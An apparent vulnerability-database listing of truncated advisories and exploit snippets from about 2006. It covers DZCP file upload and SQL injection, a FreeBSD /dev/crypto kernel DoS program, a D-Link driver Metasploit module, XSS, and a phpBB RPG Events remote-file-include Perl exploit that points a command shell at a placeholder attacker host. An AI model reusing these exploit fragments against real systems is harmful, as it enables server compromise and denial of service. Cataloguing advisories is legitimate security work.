deV!Lz Clanportal [DZCP] <= 1.3.6 Arbitrary File Upload Vulnerability

Exploit for unknown platform in category web applications ===================================================================== deV!Lz Clanportal DZCP = 1.3.6 Arbitrary File Upload Vulnerability ===================================================================== S Y N O P S I S /...

DZCP (deV!L`z Clanportal) 1.3.6 - &#039;Show&#039; SQL Injection

source: https://www.securityfocus.com/bid/21391/info deV!Lz Clanportal is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application,...

DZCP (deV!L`z Clanportal) 1.3.6 - Arbitrary File Upload

S Y N O P S I S / =================' - access: remote severity: high - deV!Lz Clanportal allows nearly arbitrary files to be uploaded and stored on the server's filesystem, which enables anyone, even without a user account, to upload PHP code and execute it, leading to arbitrary code execution. B...

DZCP (deV!L_z Clanportal) 1.3.6 - Show SQL Injection

DZCP deV!Lz Clanportal 1.3.6 - Show SQL Injection source: https://www.securityfocus.com/bid/21391/info deV!Lz Clanportal is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could...

DZCP (deV!L_z Clanportal) 1.3.6 - Arbitrary File Upload

DZCP deV!Lz Clanportal 1.3.6 - Arbitrary File Upload S Y N O P S I S / =================' - access: remote severity: high - deV!Lz Clanportal allows nearly arbitrary files to be uploaded and stored on the server's filesystem, which enables anyone, even without a user account, to upload PHP code a...

D-Link DWL-G132 Wireless Driver Beacon Rates Overflow Exploit (meta)

No description provided by source. require 'msf/core' module Msf class Exploits::Windows::Driver::DLinkDWLG132WiFiRates Msf::Exploit::Remote include Exploit::Lorcon include Exploit::KernelMode def initializeinfo = superupdateinfoinfo, 'Name' = 'D-Link DWL-G132 Wireless Driver Beacon Rates...

CVE-2006-5550

The kernel in FreeBSD 6.1 and OpenBSD 4.0 allows local users to cause a denial of service via unspecified vectors involving certain ioctl requests to /dev/crypto...

CVE-2006-5550

The CVE concerns the kernel of FreeBSD 6.1 and OpenBSD 4.0 where local users can cause a denial of service through certain ioctl requests to /dev/crypto. The connected sources confirm the affected OS versions and the attack vector (local, via ioctl on /dev/crypto) but do not provide technical roo...

FreeBSD 6.1 - devcrypto Local Kernel Denial of Service

FreeBSD 6.1 - devcrypto Local Kernel Denial of Service // Evgeny Legerov elegerov.blogspot.com include unistd.h include sys/types.h include stdio.h include fcntl.h include crypto/cryptodev.h int main int fd2, fd; struct cryptkop kop; printf"FreeBSD 6.1 /dev/crypto local kernel DoS\n"; fd2 =...

FreeBSD 6.1 (/dev/crypto) Local Kernel Denial of Service Exploit

Exploit for bsd platform in category dos / poc ================================================================ FreeBSD 6.1 /dev/crypto Local Kernel Denial of Service Exploit ================================================================ // Evgeny Legerov elegerov.blogspot.com include unistd.h...

FreeBSD 6.1 - &#039;/dev/crypto&#039; Local Kernel Denial of Service

// Evgeny Legerov elegerov.blogspot.com include unistd.h include sys/types.h include stdio.h include fcntl.h include crypto/cryptodev.h int main int fd2, fd; struct cryptkop kop; printf"FreeBSD 6.1 /dev/crypto local kernel DoS\n"; fd2 = open"/dev/crypto", ORDWR, 0; if fd2 == -1 perror"open";...

CVE-2006-5447

Cross-site scripting XSS vulnerability in index.php in DEV Web Management System WMS 1.5 allows remote attackers to inject arbitrary web script or HTML via the action parameter...

CVE-2006-5447

Cross-site scripting XSS vulnerability in index.php in DEV Web Management System WMS 1.5 allows remote attackers to inject arbitrary web script or HTML via the action parameter...

CVE-2006-5447

The vulnerability CVE-2006-5447 affects DEV Web Management System (WMS) version 1.5 as described in PT-2006-6166. It is a cross-site scripting (XSS) flaw in index.php where the action parameter can be exploited to inject arbitrary web script or HTML. The core issue is an XSS exposure in the index...

{x0n3-h4ck} DEV Web Manager System &lt;= 1.5 XSS Exploit

-=--------------------ADVISORY-------------------=- -= =- -= DEV Web Manager System = 1.5 =- -= =- -= Author: CorryL corryl80 at gmail dot com email concealed =- -= www.x0n3-h4ck.org =- -=----------------------------------------------------=- -=+ Application: DEV Web Manager System -=+ Version: 1...

phpbbrpg-rfi.txt

!/usr/bin/perl PHPBB RPG Events 1.0.0 Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high Site: http://mods.best-dev.com/old/files/rpgevents-part2.zip use IO::Socket; use LWP::Simple; $cmdshell="http://attacker.com/cmd.txt"; ";$cmd = ; while$cmd !...

Dev Web Manager System 1.5 - index.php Cross-Site Scripting

Dev Web Manager System 1.5 - index.php Cross-Site Scripting source: https://www.securityfocus.com/bid/20590/info DEV Web Manager System is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker may leverage this issue to have...

Debian DSA-873-1 : net-snmp - programming error

A security vulnerability has been found in Net-SNMP releases that could allow a denial of service attack against Net-SNMP agents that have opened a stream based protocol e.g. TCP but not UDP. By default, Net-SNMP does not open a TCP port. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The...

phpBB RPG Events 1.0 functions_rpg_events Remote File Include Exploit

No description provided by source. !/usr/bin/perl PHPBB RPG Events 1.0.0 Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high...

Exhibit Engine 1.5 RC 4 - &#039;photo_comment.php&#039; File Inclusion

' ' EXPLOIT coded by Kacper in Visual Basic ;- ' '::::::::: :::::::::: ::: ::: ::::::::::: ::: ':+: :+: :+: :+: :+: :+: :+: '+:+ +:+ +:+ +:+ +:+ +:+ +:+ '++ +:+ +++:++ ++ +:+ ++ ++ '++ ++ ++ ++ ++ ++ ++ '+ + + +++ + + ' '::::::::::: :::::::::: ::: :::: :::: ' :+: :+: :+: :+: +:+:+: :+:+:+ ' +:+ +...